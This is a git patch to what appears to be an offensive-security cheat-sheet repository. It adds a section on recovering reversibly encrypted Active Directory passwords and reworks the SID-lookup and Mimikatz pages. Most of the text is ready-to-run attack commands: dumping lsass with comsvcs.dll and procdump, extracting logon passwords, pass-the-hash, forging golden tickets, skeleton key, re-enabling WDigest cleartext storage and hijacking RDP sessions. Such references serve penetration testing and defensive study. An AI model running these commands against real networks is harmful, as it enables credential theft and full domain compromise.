From 5966c3a21b7023c42bc1b894c1162d2fb2424d56 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 11 Nov 2022 14:52:56 +0100 Subject: [PATCH] NTDS Reversible Encryption --- Insecure Deserialization/DotNET.md | 1 + .../Active Directory Attack.md | 56 ++++++++----- .../Windows - Mimikatz.md | 78 ++++++++++--------- 3 files changed, 82 insertions(+), 53 deletions(-) diff --git a/Insecure Deserialization/DotNET.md b/Insecure Deserialization/DotNET.md index 0fef027..d5f014b 100644 --- a/Insecure Deserialization/DotNET.md +++ b/Insecure Deserialization/DotNET.md @@ -83,6 +83,7 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t ### JSON.NET +* In C# source code, look for `JsonConvert.DeserializeObject(json, new JsonSerializerSettings`. * Payload output: **JSON** ```ps1 diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index b0360d8..c8d6f66 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -40,6 +40,7 @@ - [Using Mimikatz DCSync](#using-mimikatz-dcsync) - [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa) - [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat) + - [NTDS Reversible Encryption](#ntds-reversible-encryption) - [User Hunting](#user-hunting) - [Password spraying](#password-spraying) - [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing) @@ -482,24 +483,27 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine. -```powershell -# remote -rpcclient $> lookupnames john.smith -john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1) - -# loc -wmic useraccount get name,sid -Administrator S-1-5-21-3415849876-833628785-5197346142-500 -Guest S-1-5-21-3415849876-833628785-5197346142-501 -Administrator S-1-5-21-297520375-2634728305-5197346142-500 -Guest S-1-5-21-297520375-2634728305-5197346142-501 -krbtgt S-1-5-21-297520375-2634728305-5197346142-502 -lambda S-1-5-21-297520375-2634728305-5197346142-1110 - -# powerview -Convert-NameToSid high-sec-corp.localkrbtgt -S-1-5-21-2941561648-383941485-1389968811-502 -``` +* RPCClient + ```powershell + rpcclient $> lookupnames john.smith + john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1) + ``` +* WMI + ```powershell + wmic useraccount get name,sid + Administrator S-1-5-21-3415849876-833628785-5197346142-500 + Guest S-1-5-21-3415849876-833628785-5197346142-501 + Administrator S-1-5-21-297520375-2634728305-5197346142-500 + Guest S-1-5-21-297520375-2634728305-5197346142-501 + krbtgt S-1-5-21-297520375-2634728305-5197346142-502 + lambda S-1-5-21-297520375-2634728305-5197346142-1110 + ``` +* Powerview + ```powershell + Convert-NameToSid high-sec-corp.localkrbtgt + S-1-5-21-2941561648-383941485-1389968811-502 + ``` +* CrackMapExec: `crackmapexec ldap DC1.lab.local -u username -p password -k --get-sid` ```bash Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 @@ -1329,6 +1333,22 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H. - [crackstation.net](https://crackstation.net) - [hashes.com](https://hashes.com/en/decrypt/hash) + +#### NTDS Reversible Encryption + +`UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED` ([0x00000080](http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm)), if this bit is set, the password for this user stored encrypted in the directory - but in a reversible form. + +The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin. +This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”. + +* List users with "Store passwords using reversible encryption" enabled + ```powershell + Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl + ``` + +The password retrieval is already handled by [SecureAuthCorp/secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) and mimikatz, it will be displayed as CLEARTEXT. + + ### User Hunting Sometimes you need to find a machine where a specific user is logged in. diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 049a66e..403a2d2 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -2,25 +2,25 @@ ## Summary -* [Mimikatz - Execute commands](#mimikatz---execute-commands) -* [Mimikatz - Extract passwords](#mimikatz---extract-passwords) -* [Mimikatz - LSA Protection Workaround](#mimikatz---lsa-protection-workaround) -* [Mimikatz - Mini Dump](#mimikatz---mini-dump) -* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash) -* [Mimikatz - Golden ticket](#mimikatz---golden-ticket) -* [Mimikatz - Skeleton key](#mimikatz---skeleton-key) -* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover) -* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi) +* [Execute commands](#execute-commands) +* [Extract passwords](#extract-passwords) +* [LSA Protection Workaround](#lsa-protection-workaround) +* [Mini Dump](#mini-dump) +* [Pass The Hash](#pass-the-hash) +* [Golden ticket](#golden-ticket) +* [Skeleton key](#skeleton-key) +* [RDP session takeover](#rdp-session-takeover) +* [Credential Manager & DPAPI](#credential-manager--dpapi) * [Chrome Cookies & Credential](#chrome-cookies--credential) * [Task Scheduled credentials](#task-scheduled-credentials) * [Vault](#vault) -* [Mimikatz - Commands list](#mimikatz---commands-list) -* [Mimikatz - Powershell version](#mimikatz---powershell-version) +* [Commands list](#commands-list) +* [Powershell version](#powershell-version) * [References](#references) ![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png) -## Mimikatz - Execute commands +## Execute commands Only one command @@ -38,7 +38,7 @@ mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::wdigest ``` -## Mimikatz - Extract passwords +## Extract passwords > Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled. @@ -63,7 +63,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo * Adding requires lock * Removing requires reboot -## Mimikatz - LSA Protection Workaround +## LSA Protection Workaround - LSA as a Protected Process (RunAsPPL) ```powershell @@ -108,7 +108,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo ``` -## Mimikatz - Mini Dump +## Mini Dump Dump the lsass process with `procdump` @@ -132,22 +132,22 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass. ``` +Use the minidump: +* Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"` + ```powershell + mimikatz # sekurlsa::minidump lsass.dmp + mimikatz # sekurlsa::logonPasswords + ``` +* Pypykatz: `pypykatz lsa minidump lsass.dmp` -Then load it inside Mimikatz. -```powershell -mimikatz # sekurlsa::minidump lsass.dmp -Switch to minidump -mimikatz # sekurlsa::logonPasswords -``` - -## Mimikatz - Pass The Hash +## Pass The Hash ```powershell mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe154a1b42872f4e /run:powershell ``` -## Mimikatz - Golden ticket +## Golden ticket ```powershell .\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt @@ -157,7 +157,7 @@ mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe15 .\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit ``` -## Mimikatz - Skeleton key +## Skeleton key ```powershell privilege::debug @@ -168,17 +168,25 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab ``` -## Mimikatz - RDP session takeover +## RDP session takeover Use `ts::multirdp` to patch the RDP service to allow more than two users. -Run tscon.exe as the SYSTEM user, you can connect to any session without a password. +* Enable privileges + ```powershell + privilege::debug + token::elevate + ``` +* List RDP sessions + ```powershell + ts::sessions + ``` +* Hijack session + ```powershell + ts::remote /id:2 + ``` -```powershell -privilege::debug -token::elevate -ts::remote /id:2 -``` +Run `tscon.exe` as the SYSTEM user, you can connect to any session without a password. ```powershell # get the Session ID you want to hijack @@ -188,7 +196,7 @@ net start sesshijack ``` -## Mimikatz - Credential Manager & DPAPI +## Credential Manager & DPAPI ```powershell # check the folder to find credentials @@ -235,7 +243,7 @@ Attributes : 0 vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\" ``` -## Mimikatz - Commands list +## Commands list | Command |Definition| |:----------------:|:---------------| @@ -262,7 +270,7 @@ vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\" |TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box| |TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials. -## Mimikatz - Powershell version +## Powershell version Mimikatz in memory (no binary on disk) with :